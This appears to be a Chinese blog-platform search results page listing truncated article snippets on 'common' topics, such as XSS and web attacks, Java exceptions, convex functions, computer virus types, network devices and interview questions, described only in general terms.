    用户通过浏览器访问web网页,xss攻击通过各种办法用户访问页面的时候,插入一些自己的代码或者脚本,让用户访问页面的时候,就可以执行这个脚本,攻击者通过插入的脚本的执行就会获得一些信息(比如cookie),发送...
  • Java中常见的五种异常

    千次阅读 2021-03-01 07:19:24
    如果设为(int)temp就会报错了,因为它们类型不一样,但是设为(object)temp就可以,因为object是它们的父类2.IndexOutOfBoundsException(数组越界)这个异常我们操作数组的时候会经常遇到,异常的解释是“数组下标...
  • 常见的几个凸函数与凹函数

    万次阅读 热门讨论 2019-02-24 23:34:36
    参照 《convex optimization》这本书,总结几个常见的凸函数和凹函数。 (定义域与参数都是实数)。 指数函数 eaxe^{ax}eax 为凸函数 幂函数 xax^{a}xa a≥1a\geq1a≥1 或 a≤0a\leq 0a≤0 时是凸函数, 0&...
  • Web开发常见问题汇总

    万次阅读 2021-11-09 12:28:41
    Spring注解之@Scope @Scope注解是Spring IOC容器中的一个作用域,Spring IOC容器中具有以下几种作用域: 基本作用域singleton(单例)、prototype(多例),Web作用域(reqeust、session、globalsession),自定义...
  • C语言常见错误归纳

    千次阅读 2020-11-30 12:45:35
    #C语言常见错误 一、编译错误 1、缺少分号 2、If else if else switch 未配对,缺少{} 3、参数不匹配 比如 (1) %d------int (2)%ld-----long int (3)%u------unsigned int (4)%f------float (5)%lf-----double (6)%c...
  • 常见的编译器

    千次阅读 2021-10-13 20:37:55
    其中前端常见的编译器有 Sublime Text Sublime Text凭借其漂亮的用户界面和极其强大的功能,被誉为“神级”代码开发工具。 Visual Studio Microsoft Visual Studio,简称VS,是微软公司的开发工具包...
  • Python常见的异常类型

    千次阅读 2022-02-22 11:46:48
    python出现异常的常见类型
  • 五种常见的计算机病毒种类有哪些

    万次阅读 2021-07-14 00:38:38
    五种常见的计算机病毒种类有系统病毒、蠕虫病毒、木马病毒、脚本病毒、宏病毒。计算机病毒(Computer Virus)是编制者计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机...
  • 常见的web攻击有哪些?如何防御?

    千次阅读 2022-04-02 20:43:09
    web攻击是什么 Web攻击(WebAttack)是针对用户上网行为或网站服务器等设备进行攻击的行为,如植入恶意代码、修改网站权限、获取网站...常见的Web攻击有: XSS (Cross Site Scripting) 跨站脚本攻击 CSRF(Cross-site
  • 常见网络端口 计算机上的物理端口允许与外围设备(如键盘和鼠标)进行通信,并可以通过以太网电缆与Internet设备连接。 Linux终端 适用于Linux的7大终端模拟器 用于Linux中数据分析的10个命令行工具 立即...
  • SpringMVC常见面试题总结(超详细回答)

    万次阅读 多人点赞 2018-07-08 22:51:43
    注解实际开发中非常常见,比如 Java 原生的 @Overried、@Deprecated 等,Spring的 @Controller、@Service等,Lombok 工具类也有大量的注解,不过原生 Java 中,还提供了元 Annotation(元注解),他主要是用来...
  • 常见的网络设备有哪些

    千次阅读 2021-06-25 13:26:08
    常见的网络设备有计算机(无论其为个人电脑或服务器)、集线器、交换机、网桥、路由器、网关、网络接口卡(NIC)、无线接入点(WAP)、打印机和调制解调器、光纤收发器、光缆等。网络设备及部件是连接到网络中的物理实体。...
  • 常见网络故障排查

    千次阅读 多人点赞 2019-02-25 15:21:54
    常见的网络故障主要有 硬件故障 和 软件故障 硬件故障主要有: ① 网卡物理损坏 (由于使用中发送电子元件损坏而造成网卡无法使用) ② 链路故障 (常表现为网线或水晶头制作过程中出现线路问题, 或 线路老化造成...
  • 常见bug总结

    千次阅读 2018-10-15 14:35:59
    常见bug总结: 1.网络交慢或者弱网状态下,新增某个功能时,快速2次点击提交按钮,会造成数据的重复提交  解决方法:点击提交后,将按钮变为disable状态,禁止用户再次点 2.删除不存在的id,报错或者 崩溃  解决...
  • 然而,服务器日常运行过程中,由于其复杂的硬件结构、繁琐的运行原理,经常会出现一些大大小小的问题困扰着各位。下面精心整理一些服务器的常见问题汇总,帮助各位排忧解难。 1.系统蓝屏、频繁死机、重启、反映...
  • 常见中间件漏洞总结

    万次阅读 2019-01-25 16:31:58
    软件不同的技术之间共享资源。中间件位于客户机/ 服务器的操作系统 之上,管理计算机资源和网络通讯。是连接两个独立应用程序或独立系统 的软件。相连接的系统,即使它们具有不同的接口,但通过中间件相互之 间仍...
  • 常见的网络协议

    千次阅读 2019-04-20 10:59:22
    1.应用层协议 ... FTP(File TransportProtocol,文件传输协议)是网络上两台计算机传送文件...行 TCP 之上,是通过 Internet 将文件从一台计算机传输到另一台计算机的一种途径。 TFTP(Trivial FileTransfer Pr...
  • HVV面试之——常见的框架漏洞

    千次阅读 2022-04-29 15:12:40
    常见的框架漏洞前言Spring框架漏洞漏洞原理Spring框架特征Struts2框架漏洞漏洞原理攻击特征ThinkPHP 框架漏洞攻击特征shiro框架漏洞漏洞原理攻击特征 前言 hvv中的应急响应需要我们可以对常见的攻击事件分析,所以...
  • 生活中最常见纳米技术有哪些

    千次阅读 2021-06-23 02:27:19
    1、生活中最常见纳米技术有哪些纳米材料我们日常生活中还是挺常见的,虽然我们看不到单个纳米粒子,但我们可以看到他们的团聚物 不过很多真正的、好的纳米材料目前都应用高科技领悟,民用也有,相对少些。...
  • 几种常见的网络攻击

    千次阅读 热门讨论 2020-05-02 23:44:46
    网络攻击XSSCSRFSQL注入DDOS XSS XSS,跨站请求伪造(cross site ...譬如某个评论里,发表一段如下代码:(可以尝试csdn上试试),如果该网站通过cookie管理用户名密码,那访问含有该脚本的链接后,会携带co...
  • Linux常见面试题

    千次阅读 2019-08-15 11:49:22
    目录 Linux的体系结构 如何查找特定的文件 ...面试中常见的用法: Linux的体系结构 体系结构主要分为用户态(用户上层活动)和内核态 内核:本质是一段管理计算机硬件设备的程序(Linux启动后首先启动内核)...
  • 常见求导公式

    千次阅读 2018-10-17 13:59:53
    1. (其中 为常数),则 2. ,则 3. ,则,特别的,则 4. ,则 (, 且)。特别的,则 5. ,则 6. ,则 ...2. 可导的函数一定连续,但是连续的函数不一定可以导,例如y=|x|,x=0处不可导,...
  • 常见的几种网络设备

    万次阅读 2018-03-30 18:12:57
    一、网卡(Network Interface) 使计算连网的网络设备。 二、中继器(RP Repeater) ...工作物理层上的连接设备,OSI模型的物理层设备。...适用于完全相同的两类网络的互连,主要功能是通过对...不能传输速度...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 2,835,541
精华内容 1,134,216
关键字:

常见在